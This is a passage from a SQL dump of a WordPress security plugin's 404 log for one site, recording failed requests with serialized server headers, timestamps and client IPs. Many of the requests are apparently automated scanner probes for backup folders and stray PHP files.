Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120332.73480510711669921875;s:12:\"REQUEST_TIME\";i:1631120332;}}','notice','2021-09-08 16:58:54','2021-09-08 16:58:53',72618432,72703568,'http://zphiblgz.org/bk',1,0,'34.71.21.196'),(96841,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120335.00207996368408203125;s:12:\"REQUEST_TIME\";i:1631120335;}}','notice','2021-09-08 16:58:56','2021-09-08 16:58:55',72618480,72703608,'http://zphiblgz.org/backup',1,0,'34.71.21.196'),(96842,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120337.228382110595703125;s:12:\"REQUEST_TIME\";i:1631120337;}}','notice','2021-09-08 16:58:59','2021-09-08 16:58:57',72618448,72703584,'http://zphiblgz.org/old',1,0,'34.71.21.196'),(96843,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120339.5147941112518310546875;s:12:\"REQUEST_TIME\";i:1631120339;}}','notice','2021-09-08 16:59:01','2021-09-08 16:58:59',72618560,72703680,'http://zphiblgz.org/old-site',1,0,'34.71.21.196'),(96844,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120341.7129058837890625;s:12:\"REQUEST_TIME\";i:1631120341;}}','notice','2021-09-08 16:59:03','2021-09-08 16:59:02',72618528,72703656,'http://zphiblgz.org/oldsite',1,0,'34.71.21.196'),(96845,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120344.055767059326171875;s:12:\"REQUEST_TIME\";i:1631120344;}}','notice','2021-09-08 16:59:06','2021-09-08 16:59:04',72618448,72703584,'http://zphiblgz.org/new',1,0,'34.71.21.196'),(96846,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120346.3043220043182373046875;s:12:\"REQUEST_TIME\";i:1631120346;}}','notice','2021-09-08 16:59:08','2021-09-08 16:59:06',72618472,72703600,'http://zphiblgz.org/main',1,0,'34.71.21.196'),(96847,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631123668.4418380260467529296875;s:12:\"REQUEST_TIME\";i:1631123668;}}','notice','2021-09-08 17:54:30','2021-09-08 17:54:28',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'195.246.120.171'),(96848,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.9,fr;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631130853.4696979522705078125;s:12:\"REQUEST_TIME\";i:1631130853;}}','notice','2021-09-08 19:54:16','2021-09-08 19:54:13',72737344,72819704,'https://zphiblgz.org/_profiler/phpinfo',1,0,'18.222.140.108'),(96849,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631139117.1151349544525146484375;s:12:\"REQUEST_TIME\";i:1631139117;}}','notice','2021-09-08 22:11:59','2021-09-08 22:11:57',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(96850,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4099.2 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631144518.3860700130462646484375;s:12:\"REQUEST_TIME\";i:1631144518;}}','notice','2021-09-08 23:42:00','2021-09-08 23:41:58',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96851,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631147556.590567111968994140625;s:12:\"REQUEST_TIME\";i:1631147556;}}','notice','2021-09-09 00:32:38','2021-09-09 00:32:36',72617824,72701560,'http://zphiblgz.org/scholarship/application/',1,0,'87.228.19.218'),(96930,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258429.286674022674560546875;s:12:\"REQUEST_TIME\";i:1631258429;}}','notice','2021-09-10 07:20:31','2021-09-10 07:20:29',72610592,72693584,'https://zphiblgz.org/p.php',1,0,'144.172.118.4'),(96931,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258437.403501033782958984375;s:12:\"REQUEST_TIME\";i:1631258437;}}','notice','2021-09-10 07:20:39','2021-09-10 07:20:37',72610592,72693584,'https://zphiblgz.org/pass/',1,0,'107.189.28.253'),(96932,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258447.2390849590301513671875;s:12:\"REQUEST_TIME\";i:1631258447;}}','notice','2021-09-10 07:20:49','2021-09-10 07:20:47',72610976,72693984,'https://zphiblgz.org/pass/pass.php',1,0,'107.189.28.253'),(96933,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258452.850801944732666015625;s:12:\"REQUEST_TIME\";i:1631258452;}}','notice','2021-09-10 07:20:54','2021-09-10 07:20:53',72612280,72695368,'https://zphiblgz.org/newpass/newpass.php',1,0,'185.31.175.235'),(96934,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258460.960730075836181640625;s:12:\"REQUEST_TIME\";i:1631258460;}}','notice','2021-09-10 07:21:03','2021-09-10 07:21:01',72612072,72695168,'https://zphiblgz.org/newpass/',1,0,'185.31.175.235'),(96935,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631259944.168159008026123046875;s:12:\"REQUEST_TIME\";i:1631259944;}}','notice','2021-09-10 07:45:46','2021-09-10 07:45:44',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(96936,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631262218.055121898651123046875;s:12:\"REQUEST_TIME\";i:1631262218;}}','notice','2021-09-10 08:23:40','2021-09-10 08:23:38',72622048,72705784,'http://zphiblgz.org/scholarship/application/',1,0,'46.182.129.31'),(96937,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631264517.71080493927001953125;s:12:\"REQUEST_TIME\";i:1631264517;}}','notice','2021-09-10 09:01:59','2021-09-10 09:01:57',72603880,72687616,'http://zphiblgz.org/scholarship/application/',1,0,'185.220.100.245'),(96938,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"29\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631268531.55055999755859375;s:12:\"REQUEST_TIME\";i:1631268531;}}','notice','2021-09-10 10:08:53','2021-09-10 10:08:51',72626880,72711488,'https://zphiblgz.org/rsau.php',1,0,'185.191.34.215'),(96916,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258329.1761209964752197265625;s:12:\"REQUEST_TIME\";i:1631258329;}}','notice','2021-09-10 07:18:51','2021-09-10 07:18:49',72610928,72693944,'https://zphiblgz.org/merge.php',1,0,'45.153.160.132'),(96915,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258323.6632730960845947265625;s:12:\"REQUEST_TIME\";i:1631258323;}}','notice','2021-09-10 07:18:45','2021-09-10 07:18:43',72612104,72695224,'https://zphiblgz.org/emerg.php',1,0,'45.151.167.10'),(96913,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258292.7023260593414306640625;s:12:\"REQUEST_TIME\";i:1631258292;}}','notice','2021-09-10 07:18:14','2021-09-10 07:18:12',72612160,72695272,'https://zphiblgz.org/mergency.php',1,0,'45.153.160.132'),(96914,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258298.1948959827423095703125;s:12:\"REQUEST_TIME\";i:1631258298;}}','notice','2021-09-10 07:18:20','2021-09-10 07:18:18',72612104,72695224,'https://zphiblgz.org/emerge.php',1,0,'185.220.101.242'),(96912,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258289.1898510456085205078125;s:12:\"REQUEST_TIME\";i:1631258289;}}','notice','2021-09-10 07:18:11','2021-09-10 07:18:09',72612152,72695264,'https://zphiblgz.org/emergen.php',1,0,'45.153.160.132'),(96911,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 